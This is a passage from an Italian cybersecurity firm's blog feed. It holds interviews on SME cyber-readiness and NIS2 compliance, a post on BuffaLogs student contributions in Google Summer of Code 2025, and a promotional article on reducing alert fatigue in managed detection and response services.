/website/static/25d295298e5f18c8515358915131513f/01294/Napoli.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;La trasformazione digitale ha portato le piccole e medie imprese italiane a confrontarsi sempre più spesso con minacce informatiche complesse, in un contesto normativo europeo in costante evoluzione. Nonostante i progressi in termini di consapevolezza, molte PMI continuano a percepire la cybersicurezza come un tema secondario o esclusivamente tecnico, sottovalutando l’impatto reale che un attacco informatico può avere su continuità operativa, reputazione e competitività.&lt;/p&gt;
&lt;p&gt;Per fare chiarezza su questi aspetti, abbiamo intervistato Francesco Napoli, Vice Presidente nazionale di CONFAPI (Confederazione Italiana della Piccola e Media Industria Privata), che ci offre una panoramica aggiornata sulle sfide che le PMI stanno affrontando, sulle implicazioni delle normative europee come il GDPR e la direttiva NIS2, e sulle iniziative concrete che l’associazione sta mettendo in campo per supportare il tessuto produttivo nazionale nel percorso verso una maggiore resilienza digitale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Qual è oggi il livello di consapevolezza delle PMI italiane rispetto ai rischi legati alla cybersicurezza e quali sono le principali minacce?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La consapevolezza è cresciuta negli ultimi anni, anche grazie alla spinta alla digitalizzazione imposta dalla pandemia. Tuttavia, molte PMI continuano a sottovalutare la portata reale delle minacce informatiche. Attacchi ransomware, furto di dati, phishing e violazioni della privacy sono tra i rischi più frequenti. Il problema è che spesso la cybersicurezza viene percepita come una questione tecnica, quando invece deve essere considerata una priorità strategica per la sopravvivenza e la crescita aziendale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Come viene percepito il rapporto tra costi e benefici nelle soluzioni di cybersecurity da parte degli imprenditori?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Purtroppo molte PMI vedono ancora la cybersicurezza come un costo anziché come un investimento necessario. È un errore di prospettiva. Oggi esistono soluzioni accessibili, scalabili e adatte anche alle piccole realtà. Il rischio reale è quello di non fare nulla: un attacco può bloccare l’operatività di un’azienda, provocare gravi danni economici e colpire duramente la reputazione. È fondamentale che gli imprenditori comprendano che investire nella protezione digitale significa investire nella continuità del proprio business.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Come valutate l’impatto del GDPR e delle normative europee sulla protezione dei dati sulle PMI italiane?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Il GDPR ha rappresentato un cambio di paradigma importante. Ha imposto nuovi obblighi, sì, ma anche portato maggiore consapevolezza sull’importanza della protezione dei dati. Per molte PMI, però, è stato un passaggio complesso, soprattutto per la mancanza di risorse interne e competenze specifiche. Nonostante le difficoltà, riteniamo che il GDPR abbia avuto un effetto positivo, spingendo le imprese a dotarsi di strumenti più adeguati e a introdurre una cultura della responsabilità digitale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Le PMI sono pronte ad affrontare le nuove direttive europee come la NIS2? Quali sono le criticità?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La direttiva NIS2 rappresenta un’evoluzione importante nel campo della sicurezza informatica, ma per molte PMI è ancora poco conosciuta. Le imprese più strutturate iniziano a muoversi, ma la maggior parte non è ancora pronta ad affrontare pienamente i nuovi obblighi. Le principali criticità sono legate alla complessità delle normative, alla scarsità di competenze interne e all’assenza di una strategia digitale integrata. È quindi fondamentale che le istituzioni e le associazioni di rappresentanza accompagnino le imprese in questo percorso, semplificando l’accesso alle informazioni e offrendo strumenti concreti di supporto.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CONFAPI offre servizi o programmi specifici per aiutare le imprese associate a migliorare la loro sicurezza informatica?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Assolutamente sì.
Stiamo lavorando per una &quot;pedagogia digitale&quot; per le piccole e medie imprese, con il preciso obiettivo di proteggere il nostro Made in Italy, che poggia proprio sulle PMI, pilastri fondamentali della nostra economia.&lt;/p&gt;
&lt;p&gt;Con questo progetto, CONFAPI intende formare delle vere e proprie &quot;sentinelle digitali&quot; per difendere il nostro ecosistema produttivo. L’obiettivo è sensibilizzare e preparare le piccole e medie imprese ad affrontare le sfide della sicurezza digitale, proteggendo il Made in Italy da minacce e attacchi informatici, garantendo nel contempo la sostenibilità e la crescita delle imprese nell’era digitale.
CONFAPI è impegnata a promuovere la cultura della cybersicurezza tra le PMI, attraverso un’ampia gamma di attività formative, consulenziali e informative.&lt;/p&gt;
&lt;p&gt;Un esempio significativo è il progetto Microcyber, realizzato in collaborazione con altri partner che ha l’obiettivo di sensibilizzare e formare le micro e piccole imprese sui rischi digitali. Il progetto prevede percorsi didattici mirati, workshop, materiali informativi e attività di supporto operativo per favorire l’adozione di misure efficaci di sicurezza.
Oltre a Microcyber, CONFAPI organizza iniziative territoriali, webinar, sportelli di assistenza e collaborazioni con esperti del settore per fornire soluzioni concrete e su misura per le nostre aziende associate.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali sono le tre raccomandazioni principali che CONFAPI si sente di dare alle PMI italiane su questo tema oggi?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La prima raccomandazione è &lt;strong&gt;non sottovalutare mai il rischio informatico&lt;/strong&gt;: nessuna azienda, per quanto piccola, è al sicuro.
La seconda è &lt;strong&gt;formare il personale&lt;/strong&gt;, perché le persone rappresentano la prima linea di difesa. Un errore umano può aprire la porta a gravi violazioni.
La terza è &lt;strong&gt;affidarsi a partner e strumenti qualificati&lt;/strong&gt;, senza improvvisare. La cybersicurezza non è un ambito in cui si può agire con superficialità.
CONFAPI è al fianco delle imprese per aiutarle a costruire un approccio consapevole, sostenibile e coerente con le normative europee.&lt;/p&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;&lt;a id=&quot;3&quot;&gt;&lt;/a&gt; 3. Cybersicurezza e infrastrutture: strategie, sfide e buone pratiche nel settore dei cantieri stradali - Intervista con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A&lt;/h2&gt;
&lt;div align=&quot;left&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/c4ba2a2d191158176cd54b3245e2d486/01294/Polidoro.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAACVElEQVR42jWS70sTcRzH768IwkDqQY8MIiiSIn1SUKYgaeGmQSpRUIGWWJJJGFZaWlBUDwpTUWkpbrp16jZ3bta8S3e7293m7vf3e9/v3W3+qP+g0wpejz7wfvP58PoQkmr4yGh4OeGfCzHraYAdFSAN4r/opiVruqSoEDmagVTD1N3hfwhZA7HlRFbMLkUioiDatmOaCCMLI6wDZFrFHzTT9/J5JB4vbP8qbv/erQboX1gBmFLsgIjCcmE+h6JZsJSDQQGEc1BQTcfZnI0lTnkaztZcaGjyfhoesQubhc0dDeyuQOQN9DkFelb0gVVtiDZeM2CQNvpXjSHG+KmgreJWIBo73thUXl115NjRkoOlV1paSSoJ8Y5hWoRkoCUuH1rLkmnpC5MjU/lASg6y+SArrQt5HVpkZLGz61ZvX0f7wwev3r97/PRZ34sOKj6qGSahQyRkRDbFZviMyPEin+FZTuQFLs0lmXVZVRcCw3W11d2dN+q91WUVZyprm9rutwy+radWooR7Pc1lXRhOpLNqUjbXZEhLkFWgBmxlY216dKCroe7Dozbf2EDlufIDpfv2HyrxtnonZ/yECnBMsSnFWdYKEdkOijAhoaSCWBVBXOTTyfj8x3vXPJNvnowP99dcOn+1seri5Yqbd+9MhBYJV90sGfX5yYmpOeo7Y2JHAchtVF3PAJvY8k1NXO/s9dzuaW71tDTXl58sO3H6cHd3+xS5Fw58i8wEF7/6ydgKDbHj6jX2NLpPApCV1+AqtyFKGstnQgvzYyOj05PjVCzMCuIfL3izyoeggVgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 2&quot; title=&quot;&quot; src=&quot;/website/static/c4ba2a2d191158176cd54b3245e2d486/71c1d/Polidoro.png&quot; srcset=&quot;/website/static/c4ba2a2d191158176cd54b3245e2d486/804b2/Polidoro.png 384w,
/website/static/c4ba2a2d191158176cd54b3245e2d486/e5715/Polidoro.png 768w,
/website/static/c4ba2a2d191158176cd54b3245e2d486/71c1d/Polidoro.png 1536w,
/website/static/c4ba2a2d191158176cd54b3245e2d486/01294/Polidoro.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;In un settore come quello delle infrastrutture stradali, dove la continuità operativa e la protezione dei dati assumono un valore critico, la cybersicurezza è ormai diventata un pilastro strategico per garantire affidabilità, compliance e fiducia. La crescente digitalizzazione dei processi, anche nei contesti più operativi come i cantieri, impone alle aziende del settore un’evoluzione continua sul fronte della sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Ne parliamo con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A., che ci offre una visione concreta su come l’azienda ha integrato la cybersecurity nelle proprie procedure, affrontando criticità, sviluppando policy interne e promuovendo una cultura aziendale orientata alla resilienza digitale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Qual è l’approccio attuale dell’azienda alla cybersicurezza?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In Divisione Cantieri Stradali S.p.A. &lt;strong&gt;consideriamo la cybersecurity un elemento fondamentale per garantire la continuità operativa e la protezione delle informazioni&lt;/strong&gt;, non solo interne, ma anche di quelle condivise con i nostri partner e clienti, spesso di livello pubblico e strategico.
Da anni ormai, abbiamo adottato un approccio preventivo e strutturato, con policy interne chiare, formazione periodica al personale e il costante aggiornamento dei nostri sistemi informativi. La sicurezza digitale è ad oggi parte integrante della nostra cultura aziendale ed elemento centrale di ogni procedura operativa.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In che modo l’esigenza di integrare la cybersicurezza influisce nella gestione delle risorse e nelle procedure aziendali? Che difficoltà avete riscontrato?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;L&apos;integrazione della cybersicurezza nei nostri processi operativi ha richiesto un investimento iniziale importante, soprattutto in termini di formazione del personale e revisione delle procedure. Tuttavia, lo riteniamo un passaggio necessario e coerente con il nostro impegno di operare con senso di responsabilità in un settore strategico come quello delle infrastrutture.
La principale difficoltà affrontata ha riguardato, sicuramente, l’allineamento tra il personale operativo nei cantieri e le esigenze della sicurezza digitale, spesso percepita come lontana dal lavoro sul campo.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Che tipo di sistemi di protezione informatica utilizzate?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilizziamo una suite integrata di soluzioni di sicurezza informatica: firewall di nuova generazione, servizi gestiti di monitoraggio e risposta in tempo reale del traffico di rete e endpoint e cloud, sistemi di backup giornalieri, sia in locale che in ambienti cloud protetti, con verifiche regolari di integrità e ripristino e crittografia dei dati sensibili e delle comunicazioni, specialmente per i documenti tecnici e i progetti condivisi con i concessionari. Ci tengo a precisare, però, che è solo un inizio e che il nostro impegno sul tema ci porterà a sviluppare ulteriori soluzioni nell’immediato futuro.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quanto ritenete importante la cybersicurezza per la reputazione dell’azienda e la fiducia dei clienti pubblici o privati?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La cybersicurezza ha un impatto diretto e crescente sulla nostra reputazione e sulla fiducia che i nostri clienti ripongono in noi. Operiamo per conto dei principali concessionari stradali e autostradali italiani, quindi trattiamo dati e progetti sensibili, spesso legati alla sicurezza nazionale o alla mobilità di milioni di cittadini. Riteniamo che essere cyber-resilienti sia un requisito imprescindibile, non solo per ottenere affidamenti, ma anche per dimostrare solidità e affidabilità nel tempo. Per questo riteniamo che investire nella cybersecurity sia parte integrante del nostro impegno per la qualità, la compliance e la sostenibilità operativa.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Google Summer of Code 2025: BuffaLogs cresce, spinto dal talento degli studenti internazionali]]></title><description><![CDATA[Dalla community al prodotto]]></description><link>https://www.certego.net/blog/buffalogs-google-summer-of-code-2025/</link><guid isPermaLink="false">buffalogs-google-summer-of-code-2025</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Threat Detection]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Lorena Goldoni, Threat Detection Engineer]]></dc:creator><pubDate>Sun, 28 Sep 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;BuffaLogs, la soluzione di Authentication Protection integrata nella nostra piattaforma PanOptikon®&lt;/strong&gt; ha visto quest&apos;anno il contributo di due studenti internazionali, nell’ambito del &lt;a href=&quot;https://summerofcode.withgoogle.com/&quot;&gt;Google Summer of Code 2025&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Il Google Summer of Code è un’iniziativa globale che promuove l’open-source e l’apprendimento pratico: sostenere giovani talenti e progetti open-source è per noi una priorità, perché arricchisce la community e porta innovazioni concrete alla nostra piattaforma.&lt;/p&gt;
&lt;p&gt;BuffaLogs, nato tre anni fa da un mio (&lt;a href=&quot;https://www.linkedin.com/in/lorena-goldoni-69154418b/&quot;&gt;Lorena Goldoni&lt;/a&gt;) progetto di tirocinio universitario in Certego, è oggi parte della Honeynet Project, una delle più riconosciute organizzazioni no-profit di ricerca in ambito cybersecurity, dedicata a indagare gli attacchi più recenti e a sviluppare strumenti open-source per migliorare la sicurezza di Internet.
È proprio grazie a questa appartenenza che BuffaLogs ha potuto partecipare al Google Summer of Code.&lt;/p&gt;
&lt;p&gt;I contributi degli studenti hanno riguardato due principali aree: &lt;strong&gt;BuffaCLI&lt;/strong&gt; e il &lt;strong&gt;modulo di Alerting&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;BuffaCLI&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;BuffaCLI&lt;/strong&gt; è un nuovo strumento a linea di comando, pensato per rendere BuffaLogs più accessibile e flessibile. Grazie a BuffaCLI, è interrogare i log, esportare i risultati, configurare componenti della piattaforma e integrarsi facilmente con altri strumenti. La sua progettazione modulare garantisce l’estendibilità futura e apre la strada all’integrazione di nuove funzionalità.&lt;/p&gt;
&lt;h2&gt;Modulo di alerting&lt;/h2&gt;
&lt;p&gt;Il &lt;strong&gt;modulo di alerting&lt;/strong&gt; di BuffaLogs è stato completamente rivisitato, diventando ricco e versatile:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Nuove integrazioni&lt;/li&gt;
&lt;li&gt;Possibilità di inviare notifiche a più canali contemporaneamente&lt;/li&gt;
&lt;li&gt;Template personalizzabili per uniformare i messaggi di alert&lt;/li&gt;
&lt;li&gt;Raggruppamento degli alert simili per evitare notifiche ridondanti&lt;/li&gt;
&lt;li&gt;Generazione di riepiloghi programmati giornalieri o settimanali&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questi interventi hanno reso il sistema più robusto, sicuro e pronto per scenari complessi di monitoraggio.&lt;/p&gt;
&lt;p&gt;Il lavoro degli studenti dimostra quanto sia importante sostenere l’open-source e la collaborazione con la community. Investire in progetti open-source permette di combinare formazione, innovazione e contributo concreto a soluzioni tecnologiche che beneficiano tutta la community. Per noi, BuffaLogs non è solo una piattaforma: è anche un esempio di come un progetto open-source possa crescere grazie alla passione, al talento e alla collaborazione tra studenti e professionisti.&lt;/p&gt;
&lt;p&gt;Siamo orgogliosi dei risultati raggiunti quest’anno e continueremo a impegnarci per promuovere iniziative che uniscono innovazione, formazione e contributo alla comunità open-source, alimentando il futuro della sicurezza digitale.&lt;/p&gt;
&lt;h2&gt;Per approfondire&lt;/h2&gt;
&lt;p&gt;Se vuoi scoprire i dettagli tecnici dei lavori svolti dagli studenti durante il Google Summer of Code, qui trovi gli articoli completi:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.honeynet.org/2025/09/15/14/&quot;&gt;GSoC 2025 Project summary. Developing BuffaCLI for Command-Line Management&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.honeynet.org/2025/09/15/15/&quot;&gt;GSoC 2025 Project summary. BuffaLogs: Alerting Module Enhancement&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Troppi allarmi?]]></title><description><![CDATA[Riduci l’alert fatigue, aumenta la sicurezza]]></description><link>https://www.certego.net/blog/troppi-allarmi-ridurre-alert-fatigue-senza-perdere-sicurezza/</link><guid isPermaLink="false">troppi-allarmi-ridurre-alert-fatigue-senza-perdere-sicurezza</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 23 Sep 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Ogni giorno gli strumenti di monitoraggio generano una mole ingente di alert, ma molti di questi non segnalano vere minacce: sono falsi positivi. Un certo livello di ridondanza è fisiologico, ma quando il numero diventa eccessivo si crea il fenomeno della &lt;strong&gt;alert fatigue: più rumore, meno attenzione, tempi di risposta rallentati e priorità confuse&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In questo scenario il rischio è duplice. Da un lato, i team di Security Operations del provider MDR faticano a distinguere i segnali critici in mezzo al rumore, con il pericolo concreto di trascurare gli incidenti davvero importanti. Dall’altro, &lt;strong&gt;l’eccesso di falsi positivi ricade anche sul cliente finale&lt;/strong&gt;, che si trova sommerso da avvisi ridondanti e costretto a lavorare più del necessario, proprio in un’area che un servizio MDR dovrebbe invece sollevarlo dal gestire.&lt;/p&gt;
&lt;p&gt;Il paradosso è chiaro: più si lavora, meno si vede ciò che conta davvero. L’attenzione si disperde e il valore che un MDR dovrebbe garantire — rapidità, efficacia e affidabilità — rischia di essere compromesso.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Perché succede e come nasce l’“alert fatigue”&lt;/h2&gt;
&lt;h4&gt;1 - Regole troppo generiche e poco contestualizzate&lt;/h4&gt;
&lt;p&gt;Molti falsi positivi derivano da regole di soluzioni tecnologiche di terze parti che, pur essendo plausibili, sono pensate per operare in contesti molto eterogenei; per questo non tengono conto del contesto specifico. Una detection progettata per adattarsi a qualsiasi ambiente finisce così per attivarsi anche dove non serve.&lt;/p&gt;
&lt;p&gt;Un esempio sono gli EDR tradizionali: strumenti oggi imprescindibili per la sicurezza, ma spesso progettati con logiche di tipo black box. Forniscono regole predefinite pensate per adattarsi a diversi contesti, ma raramente offrono trasparenza sulle modalità di rilevamento. Questo approccio li rende talvolta troppo generici, limitando le possibilità di analisi avanzata e impedendo agli analisti più esperti di analizzare e validare gli allarmi nei tempi migliori.&lt;/p&gt;
&lt;p&gt;Quando mancano informazioni chiave come chi, dove, quando e quanto è rilevante, ogni segnale viene trattato come critico per default.&lt;/p&gt;
&lt;h4&gt;2 - Mancanza di visibilità centralizzata&lt;/h4&gt;
&lt;p&gt;Molti servizi MDR si basano su un’ampia gamma di strumenti: endpoint, sonde network, cloud, log management, threat intelligence e così via. Se ciascun tool genera alert in modo indipendente, il risultato è un proliferare di duplicati, incongruenze e notifiche che non comunicano tra loro.
A questa frammentazione si aggiunge un ulteriore ostacolo: ogni strumento “parla la propria lingua”. Senza una vista unificata, l’analista deve ricostruire manualmente il quadro complessivo, come se stesse componendo un puzzle con pezzi sparsi e incompleti.&lt;/p&gt;
&lt;p&gt;Per evitare questo scenario servono tecnologie capaci di correlare eventi e segnali, provenienti da fondi differenti, in un unico ambiente. Solo così diventa possibile distinguere il rumore dagli eventi critici e avere una visione chiara e coerente delle minacce.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 34.895833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAC4jAAAuIwF4pT92AAABM0lEQVR42qVRwU6DQBDl5/0iDwreFLUX2zSa1EZUbFoKhV2gtCzsvgFnoY2X3kx4vHmzOy+zM052bCFrDW0Axb9Gg3HmS7h8Zus7IjgPPyVd+RtqqMdedygboNKEfUsDV5yz8ag7HEx/0h0qjq22ecFN8QcnVwby0GAVhoi3EYpcIom3EFmKXZIgjtaQaYJCpEMcfgUQrNM4QrxZI2JkuwR1q1EoDadgw5ZFEASYzmbw/Ud4nke3rkued0dP8wX81w9yp0u69l/IfZ7SZPFN92+fdDOZ0+J9yQ3EYJvRcJgfgL7vYYxBLgV3mTNLSJHhyBcr0yFVNDzRjqbgsWQKg7Z1Fg3fy9nLse8WRw3Jy7GJ0s6noZEZpc0x9mrkom5RqpNWf3XWY5gh8WZsh635H85b/gVZBhTxkCBP3wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/8bed596967fe8e424ce9e8da847019b6/71c1d/Alert%20Fatgue%20frase%20Certego.png&quot; srcset=&quot;/website/static/8bed596967fe8e424ce9e8da847019b6/804b2/Alert%20Fatgue%20frase%20Certego.png 384w,
/website/static/8bed596967fe8e424ce9e8da847019b6/e5715/Alert%20Fatgue%20frase%20Certego.png 768w,
/website/static/8bed596967fe8e424ce9e8da847019b6/71c1d/Alert%20Fatgue%20frase%20Certego.png 1536w,
/website/static/8bed596967fe8e424ce9e8da847019b6/a878e/Alert%20Fatgue%20frase%20Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h4&gt;3 - Triage troppo manuale (e poca automazione)&lt;/h4&gt;
&lt;p&gt;Quando gran parte degli alert viene verificata manualmente, gli analisti sprecano minuti preziosi su eventi benigni e il backlog cresce. La differenza la fanno tecnologie che filtrano e aggregano i segnali da fonti diverse e leggono il contesto prima di allertare, applicando IOC e BIOC contestualizzati.&lt;/p&gt;
&lt;p&gt;Su questa base, l’automazione del Tier 1 può anche eseguire azioni di contenimento sicure e tracciate — per esempio disabilitare o bloccare un utente e revocare sessioni, isolare un endpoint dalla rete, mettere in quarantena un file e aggiornare regole di firewall — riducendo i tempi di risposta senza togliere controllo agli analisti.&lt;/p&gt;
&lt;h4&gt;4 - Regole e procedure che non evolvono con minacce e infrastruttura&lt;/h4&gt;
&lt;p&gt;Le minacce cambiano rapidamente e le infrastrutture dei clienti anche: nuovi servizi, migrazioni cloud, identità e processi che si trasformano. Se le regole restano ferme, il rumore cresce.
Serve un approccio di detection engineering continuo: aggiornare IOC e BIOC, ricalibrare soglie e modelli comportamentali, validare e sostituire periodicamente le detection in base alle TTP più recenti e all’evoluzione dell’ambiente. Così le regole restano allineate sia agli attaccanti sia all’operatività reale, riducendo i falsi positivi senza perdere copertura.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Chi paga il prezzo dell’“alert fatigue”?&lt;/h2&gt;
&lt;p&gt;All’inizio a soffrire è il provider MDR. Il Tier 1 passa ore a scremare segnalazioni incerte, la velocità di risposta cala e l’energia mentale si consuma su verifiche ripetitive. Il Tier 2/Incident Response Team deve rincorrere pezzi di contesto sparsi tra strumenti diversi: quando il rumore è alto, le correlazioni utili si perdono e le indagini si allungano.
Il Security Operations Manager, stretto dalle SLA, vede crescere stress e turnover nel team. Così, dentro il provider MDR, la fiducia negli allarmi si erode e il tempo si sposta dalla prevenzione alla gestione del caos.&lt;/p&gt;
&lt;p&gt;Questo impatto rimbalza inevitabilmente sul cliente. Un flusso eccessivo di avvisi lo costringe a:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;gestire troppe segnalazioni,&lt;/li&gt;
&lt;li&gt;sottrarre tempo alle attività strategiche,&lt;/li&gt;
&lt;li&gt;subire escalation inutili,&lt;/li&gt;
&lt;li&gt;vedere aumentare i costi indiretti,&lt;/li&gt;
&lt;li&gt;fare lavoro extra proprio dove l’MDR dovrebbe alleggerire.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;In breve: l’alert fatigue è un moltiplicatore di inefficienza, che riduce l’efficacia del servizio e scarica sul cliente un carico ulteriore.&lt;/strong&gt;
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;La strategia di Certego&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Ridurre i falsi positivi non significa “silenziare” la sicurezza, ma raffinare il segnale: non allertare di meno, bensì allertare meglio&lt;/strong&gt;.
Per questo in Certego abbiamo sviluppato un ecosistema applicativo proprietario, pensato per garantire visibilità completa, correlazione avanzata degli eventi e controllo totale delle tecnologie, senza vincoli di terze parti:&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.90625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAC4jAAAuIwF4pT92AAABNElEQVR42oVSyVLDMAzN//8QNw4ww3DhwClDB1qW0LhOEydx4kWyZNyEJbQsb3SRLD3pSc5ijMwcF0guAHjvETG5gNh1nbUuniCTsipLIWSVCGaOEEKrEpqu7xOTcX4yIOLj4mpfF1VTCElEh0pmiwQcPxM9eKVaa+0PnVMSBHbEjUUfSDu4vLktShH4XU4iNcbMEpi/ScxSRAEjMdDhBUOoGuW8n5N4BiLzYeiqVrt9zR/xLDGfPbYOw2Jhx+OxMXFSHCZ8dU5TPTcaFsU0CeZhiIibUj6sN3erVZ7nQuySlgHJUdTDKKXMmML5k7IwSVoYTSK3dfdSimJbvopd2/cusAY2IY7WDVpnHsBona4af4EnNkh+sf/lwv4BhXBxda2tP/1OfxXPqWYc8/t13Xand34DsPOEEFeqWFYAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/ff2c539bb09f25db64ec984c4abdeecd/71c1d/Ecosistema%20Applicativo%202025%20Certego.png&quot; srcset=&quot;/website/static/ff2c539bb09f25db64ec984c4abdeecd/804b2/Ecosistema%20Applicativo%202025%20Certego.png 384w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/e5715/Ecosistema%20Applicativo%202025%20Certego.png 768w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/71c1d/Ecosistema%20Applicativo%202025%20Certego.png 1536w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/a878e/Ecosistema%20Applicativo%202025%20Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;PanOptikon®&lt;/strong&gt;: la piattaforma unificata di Security Operations che integra tutte le attività di SecOps, dalla visibilità sugli ambienti IT alla gestione degli incidenti end-to-end, con procedure basate sul framework NIST e reportistica conforme alle normative.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Halo&lt;/strong&gt;: sviluppata per gli analisti di Certego, offre una visibilità avanzata sui dati telemetrici degli endpoint e supera le logiche black box dei tradizionali EDR. Permette di creare regole di detection personalizzate e di correlare molteplici eventi in un unico allarme, riducendo i falsi positivi e i carichi di lavoro.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Threat Intel (Quokka e IntelOwl&lt;/strong&gt;): le piattaforme di Certego per arrichire e validare i dati di threat intelligence, raccogliendo informazioni da honeypot, sensori, dark web e fonti di info-sharing, per trasformare i segnali in verdetti affidabili e contestualizzati.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
